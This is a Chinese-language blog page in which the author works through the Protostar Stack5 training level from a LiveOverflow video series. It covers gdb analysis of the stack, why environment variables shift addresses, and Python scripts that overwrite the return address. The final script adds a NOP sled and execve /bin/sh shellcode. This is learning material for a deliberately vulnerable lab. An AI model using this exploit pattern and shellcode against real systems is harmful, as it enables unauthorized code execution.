<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Binary-Hacking," />










<meta name="description" content="本篇博文是关于shellcode的学习，视频前前后后看了十几遍，里面的步骤也跟着做了十几遍，总算是有点眉目了。">
<meta name="keywords" content="Binary-Hacking">
<meta property="og:type" content="article">
<meta property="og:title" content="Liveoverflow-0x0E-Shellcode">
<meta property="og:url" content="http://yoursite.com/2018/10/03/Liveoverflow-0x0E-Shellcode/index.html">
<meta property="og:site_name" content="Muirelle的博客">
<meta property="og:description" content="本篇博文是关于shellcode的学习，视频前前后后看了十几遍，里面的步骤也跟着做了十几遍，总算是有点眉目了。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.imgur.com/ZmZuJOs.png">
<meta property="og:image" content="https://i.imgur.com/IMyTgX4.png">
<meta property="og:image" content="https://i.imgur.com/a7OaI5m.png">
<meta property="og:image" content="https://i.imgur.com/0CefmJe.png">
<meta property="og:image" content="https://i.imgur.com/Net6TSv.png">
<meta property="og:image" content="https://i.imgur.com/nlygY4U.png">
<meta property="og:image" content="https://i.imgur.com/OCdFu4x.jpg">
<meta property="og:image" content="https://i.imgur.com/XZCxXXM.png">
<meta property="og:image" content="https://i.imgur.com/Rjo0xJh.png">
<meta property="og:updated_time" content="2018-10-17T14:46:29.192Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Liveoverflow-0x0E-Shellcode">
<meta name="twitter:description" content="本篇博文是关于shellcode的学习，视频前前后后看了十几遍，里面的步骤也跟着做了十几遍，总算是有点眉目了。">
<meta name="twitter:image" content="https://i.imgur.com/ZmZuJOs.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/10/03/Liveoverflow-0x0E-Shellcode/"/>





  <title>Liveoverflow-0x0E-Shellcode | Muirelle的博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Muirelle的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/10/03/Liveoverflow-0x0E-Shellcode/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Muirelle">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Muirelle的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Liveoverflow-0x0E-Shellcode</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-10-03T18:38:22+08:00">
                2018-10-03
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本篇博文是关于shellcode的学习，视频前前后后看了十几遍，里面的步骤也跟着做了十几遍，总算是有点眉目了。</p>
<a id="more"></a>
<p>学习需要用到的protostar在视频里面有链接，这里就不贴出来了。</p>
<p>视频链接：<a href="http://liveoverflow.com/binary_hacking/" target="_blank" rel="noopener">http://liveoverflow.com/binary_hacking/</a></p>
<h1 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h1><hr>
<h2 id="Protostar-Stack5"><a href="#Protostar-Stack5" class="headerlink" title="Protostar Stack5"></a>Protostar Stack5</h2><h2 id="About"><a href="#About" class="headerlink" title="About"></a>About</h2><p><strong>Stack5 is a standard buffer overflow, this time introducing shellcode.</strong></p>
<p><strong>This level is at /opt/protostar/bin/stack5</strong></p>
<p><strong>Hints</strong></p>
<ul>
<li>At this point in time, it might be easier to use someone elses shellcode</li>
<li>if debugging the shellcode, use\xcc (int3) to stop the program executing and return to the debugger</li>
<li>remove the int3s once your shellcode is done.</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buffer[<span class="number">64</span>];</span><br><span class="line">  gets(buffer);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<hr>
<h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><p>首先看源码，很短，就一个gets。放到gdb里面看一下</p>
<p><img src="https://i.imgur.com/ZmZuJOs.png" alt=""></p>
<p>首先要弄清楚绿框内的东西是什么意思，这被称为<strong>Calling Convention</strong>(函数调用约定)，也就是说下面call所调用的gets函数的参数要从绿框所指定的地址里面获取，也就是<strong>esp+0x10</strong>这个地址，被<strong>mov DWORD PTR  [esp],eax</strong> 放在了栈顶的位置。</p>
<p>先在程序开始的地方下个断点，查看栈可以知道此时esp所指向的内容就是ret将要返回的地址(蓝框)，记下此时的esp的值：<strong>0xbffff7bc</strong>，于是我们期望利用gets的溢出将这个返回的地址覆盖成我们想要的地址，这样才能执行shellcode，选哪个地址好呢，其实都无所谓，可以直接选在蓝框后面，也就是红框(<strong>0xbffff7c0</strong>)，这样理论上就可以ret到栈里(黄箭头)来执行shellcode了。</p>
<p>接下来继续单步执行到call命令之前</p>
<p><img src="https://i.imgur.com/IMyTgX4.png" alt=""></p>
<p>从刚才说的可以知道，绿框内的指令将gets所需要的参数的开始的地址放在了栈顶(红框)，因此蓝箭头所指就是字符串存放的位置。黄框就是刚刚记下的ret的地址，从蓝箭头到黄框有20*4字节，现在可以来写个脚本试试了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">padding = <span class="string">"A"</span>*<span class="number">4</span>*<span class="number">19</span></span><br><span class="line">ret = struct.pack(<span class="string">"I"</span>, <span class="number">0xbffff7c0</span>)</span><br><span class="line">payload = <span class="string">"\xcc"</span>*<span class="number">4</span> <span class="comment">#int3</span></span><br><span class="line"><span class="keyword">print</span> padding + ret + payload</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/a7OaI5m.png" alt=""><br>成功将ret地址覆盖！</p>
<p>我们运行试试</p>
<p><img src="https://i.imgur.com/0CefmJe.png" alt=""></p>
<p>得到的结果是<strong>Illegal instruction</strong>(非法指令)。什么意思呢？</p>
<p>再用gdb看看</p>
<p><img src="https://i.imgur.com/Net6TSv.png" alt=""></p>
<p>注意到栈地址不同，可是什么会导致这个差异呢？把整个栈打印出来看看</p>
<p><strong>x/1000s $esp</strong><br><img src="https://i.imgur.com/nlygY4U.png" alt=""></p>
<p>可以看到，红色框部分内容是完全一样的，直到黄框内容发生了变化，PWD，也就是目前工作目录，由于PWD的不同，较长的PWD导致栈的内容相当于被往上挤了，于是在上面ret的地方导致栈地址错位，所以刚刚写的脚本就不能准确的跳转到ret后面的那个地址了。</p>
<p>所以。。这个地方需要一些neat trick 下面是思路:P</p>
<p><img src="https://i.imgur.com/OCdFu4x.jpg" alt=""></p>
<p>现在可以尝试添加shellcode来拿shell了</p>
<p>先找个shellcode：<a href="http://shell-storm.org/shellcode/" target="_blank" rel="noopener">http://shell-storm.org/shellcode/</a></p>
<p><img src="https://i.imgur.com/XZCxXXM.png" alt=""></p>
<pre><code>&quot;\x31\xc0\x50\x68\x2f\x2f\x73&quot;
&quot;\x68\x68\x2f\x62\x69\x6e\x89&quot;
&quot;\xe3\x89\xc1\x89\xc2\xb0\x0b&quot;
&quot;\xcd\x80\x31\xc0\x40\xcd\x80&quot;
</code></pre><p>然后直接扔到脚本里面就行了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">padding = <span class="string">"A"</span>*<span class="number">4</span>*<span class="number">19</span></span><br><span class="line">ret = struct.pack(<span class="string">"I"</span>, <span class="number">0xbffff7c0</span>+<span class="number">32</span>)</span><br><span class="line">nop = <span class="string">"\x90"</span>*<span class="number">100</span></span><br><span class="line">payload = <span class="string">"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"</span></span><br><span class="line"><span class="keyword">print</span> padding + ret + nop + payload</span><br></pre></td></tr></table></figure>
<p>然后我们尝试运行</p>
<p><img src="https://i.imgur.com/Rjo0xJh.png" alt=""></p>
<p>成功拿到shell！！XD</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Binary-Hacking/" rel="tag"># Binary-Hacking</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/11/使用gdb调试的基本方法/" rel="next" title="使用gdb调试的基本方法">
                <i class="fa fa-chevron-left"></i> 使用gdb调试的基本方法
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/05/Liveoverflow-0x0F-ret2libc/" rel="prev" title="Liveoverflow-0x0F-ret2libc">
                Liveoverflow-0x0F-ret2libc <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Muirelle</p>
              <p class="site-description motion-element" itemprop="description">吾将上下而求索</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#题目"><span class="nav-number">1.</span> <span class="nav-text">题目</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Protostar-Stack5"><span class="nav-number">1.1.</span> <span class="nav-text">Protostar Stack5</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#About"><span class="nav-number">1.2.</span> <span class="nav-text">About</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#分析"><span class="nav-number">2.</span> <span class="nav-text">分析</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Muirelle</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
